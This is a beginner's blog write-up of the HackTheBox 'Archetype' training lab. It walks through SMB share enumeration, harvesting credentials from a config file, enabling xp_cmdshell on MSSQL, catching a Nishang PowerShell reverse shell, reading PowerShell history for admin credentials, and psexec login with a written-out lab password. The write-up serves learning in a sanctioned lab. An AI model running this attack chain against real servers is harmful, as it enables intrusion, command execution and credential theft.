HackTheBox - Archetype Starting Point Write-Up

Good morning ladies and gentlemen. As I continue my journey as an aspiring Subject Matter Expert in Cyber Security, I am going to start doing write-ups of the virtual boxes I complete. One reason being that I believe it will help me gain a deeper understanding of what I am doing, and the other reason is so that I can possibly help those of you who are beginners like me and have a burning passion for becoming a master in this Cyber World.

This write-up will be on the Archetype box from HackTheBox. It is the first box in their Starting Point path which is supposed to allow you to “Play some of our easy machines to get a grasp on how Hack The Box works.” Now, they say these boxes are “very easy” but for those of us who are new, they can prove to be quite difficult yet extremely educational. I will attempt to note everything I do in order to pass along my understanding to the best of my ability, without further ado, let's get moving!

If you are new to HackTheBox, let me begin by explaining some basic steps. They offer two options for you to be able to connect to their rooms. One being their built-in PwnBox which is a virtual machine that they provide for you that has all of the necessary tools and resources you need to complete the boxes. I think it is a great resource that they provide but I prefer the other option. You can also connect to their server via OpenVPN and in doing this it will allow you to use your own virtual machine to interact with theirs. The pros of doing this are primarily personal preference but I thought I would share why I think this is the better option anyways. By connecting via OpenVPN and using your own Virtual Machine, you can organize your directories and set up a folder for each room that way you can take notes, document your scans, save any scripts you may need, and confine all of the new things you learn to this folder in order to have a quick and easy reference point. After creating an account, you will need to download the VPN configuration file for the specific room you are working in, and then you can use the following command to connect to their server and start getting to work. I advise downloading an application called Yakuake onto your kali box, you will thank me later.

sudo openvpn /path/to/yourdownloaded/configfile

Now, our first step is going to be basic reconnaissance.

I am going to run two nmap scans in order to get a basic understanding of the target machine.

Basic Scan: nmap -sV -vv --open 10.10.10.27 -oN basic.nmap

Vuln Scan: nmap --script=vuln 10.10.10.27 -oN vuln.nmap

Note: I will not explain what each argument and flag is for because I believe it is good practice to read the manual pages for commands in order to understand why you are using what you are using instead of just memorizing the entire command or noting it for future use.

After running these scans I found out some solid information.

Open Ports: 135, 139, 445, 1433

Operating System: Windows (and Windows Server 2008)

1433: Microsoft SQL Server 2017

Vuln Scan: smb-vuln-ms08-067

Likely Vulnerable to remote code execution (CVE 2008-4250)

Now that we know that there is a possible SMB (Server Message Block) vulnerability, we have a direction we can take for our enumeration. We will start by using the smbclient command.

smbclient -N -L \\\\10.10.10.27\\

To be honest, I am still learning what is supposed to be normal but at first glance, backups seems like it doesn't belong here and I wonder why it looks different from the rest. So, we are going to run smbclient again and specify backups this time.

	smbclient -N \\\\10.10.10.27\\backups

Once I had access to the backups share, I used dir to list the files inside, and decided to download the config file using the get command. After leaving the smb share, I used cat to read the config file, and discovered some more interesting information like a Password, and a User ID. hmm.

Now that I have credentials, Its time to gain a foothold. Since the target machine had an open port running a SQL server, I did some research and decided that I would try use Impacket's mssqlclient. The following command got me access to the server in question.

sudo python3 mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth

After trying a few commands like whoami, pwd (print working directory), and ls/dir I discovered I was on the server but had no idea what to do next. MORE RESEARCH. After looking around, I found out that I needed to configure my privileges within the server to gain a reverse shell. The following steps allowed me to discover my “whoami” and do some basic privilege escalation.

	EXEC sp_configure 'show advanced options', 1;
	reconfigure
	sp_configure
	EXEC sp_configure 'xp_cmdshell', 1; 
	reconfigure
	xp_cmdshell "whoami"

After running these commands, you should see the following:

From here, we need to use our new found privilege with xp_cmdshell to download our reverse shell script. In order to do this we need to serve up our file on a local server and set up a Netcat listening port to catch the shell once we execute it. Now you could use python to set up a SimpleHTTPServer, but I have discovered a new tool that is much easier. To serve up my file, I used Updog. It is important to note that you need to run the server command inside of the directory that your script is located in.

For this box, I decided to use Nishang's Invoke-PowershellTCPOneLine.ps1 and after cleaning it up, I made sure to change the IP to my own and renamed it to script.ps1

We are currently in the directory C:\Windows\system32 with user privileges so we can search for the User flag first. I navigated to Users\sql_svc\Desktop in order to complete this step. Once you have found the user flag, it is time for some privesc.

Right now, we are in a service account called sql_svc. I have found it to be good practice to check recently accessed files/executed commands. Mostly (or default) the console history will be saved in C:\Users\<accountname>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine\ConsoleHost_history.txt, so we just need to cat that file.

 cat C:\Users\<accountname>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine\ConsoleHost_history.txt

This shows that the backup share is mapped with admin credentials. At first I did not know what to do with this information, but after MORE RESEARCH, I found out that now is a great time to use Impacket's psexec.py script.

 python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator:MEGACORP_4dm1n\!\!@10.10.10.27

FINALLY. We now have root (admin) privileges. Now all we need to do is navigate to the admin Desktop and see if the root flag is there. What do you know, It was ;).

This completes my very first write-up for a Virtual Box. Please return critical feedback so that I can learn from this experience as much as you can. I hope this helped you guys as much as it helped me!